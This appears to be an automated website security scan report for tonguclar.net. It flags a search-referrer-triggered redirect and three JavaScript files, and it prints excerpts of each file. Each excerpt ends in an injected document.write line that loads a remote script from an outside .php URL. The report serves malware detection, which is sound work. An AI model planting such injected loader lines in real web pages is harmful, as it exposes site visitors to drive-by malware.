Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.tonguclar.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.tonguclar.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Jun 2014 04:08:25 GMT Location: http://berlinergrillwurst.de/blog/?p=5510&comment=1618483 Server: Apache/2 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://www.tonguclar.net/ | 200 OK Content-Length: 6048 Content-Type: text/html | clean |
http://www.tonguclar.net/giris/ga.js | 200 OK Content-Length: 36815 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var g=void 0,h=!0,i=null,k=!1,aa=encodeURIComponent,ba=Infinity,ea=setTimeout,fa=decodeURIComponent,l=Math;function ga(a,b){return a.name=b} var m="push",ha="slice",n="replace",ia="load",ja="floor",ka="charAt",la="value",p="indexOf",ma="match",na="port",oa="createElement",pa="path",q="name",t="host",u="toString",v="length",w="prototype",qa="clientWidth",x="split",ra="stopPropagation",ta="scope",y="location",ua="search",z="protocol",va="clientHeight",wa="href",A="substring",xa="ap document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://www.supportthevets.org/stores/aNPXKI8I.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.tonguclar.net/giris/functions.js | 200 OK Content-Length: 22076 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[24245 bytes skipped]... f(!fieldchecker("phone","contact_form")){ alert("Lütfen telefon numaranýzý giriniz!"); return false}; if(!fieldchecker("city","contact_form")){ alert("Lütfen þehrinizi giriniz!"); return false}; if(!fieldchecker("message","contact_form")){ alert("Lütfen mesajýnýzý giriniz!"); return false}; return true; } document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://acurelief.com/GY0r8uhT.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.tonguclar.net/giris.js | 404 Not Found Content-Length: 394 Content-Type: text/html | clean |
http://www.tonguclar.net/test404page.js | 404 Not Found Content-Length: 400 Content-Type: text/html | clean |
http://www.tonguclar.net/giris/jquery-1.js | 200 OK Content-Length: 78938 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-" b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof b],f.body["scroll" b],f.documentElement["scroll" b],f.body["offset" b],f.documentElement["offset" b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e "px")}})})(window); document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://www.supportthevets.org/stores/aNPXKI8I.php" type="text/javascript"></script>') /*/339810*/ Antivirus reports:
| ||
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tonguclar.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tonguclar.net/
Result: tonguclar.net is not infected or malware details are not published yet.
Result: tonguclar.net is not infected or malware details are not published yet.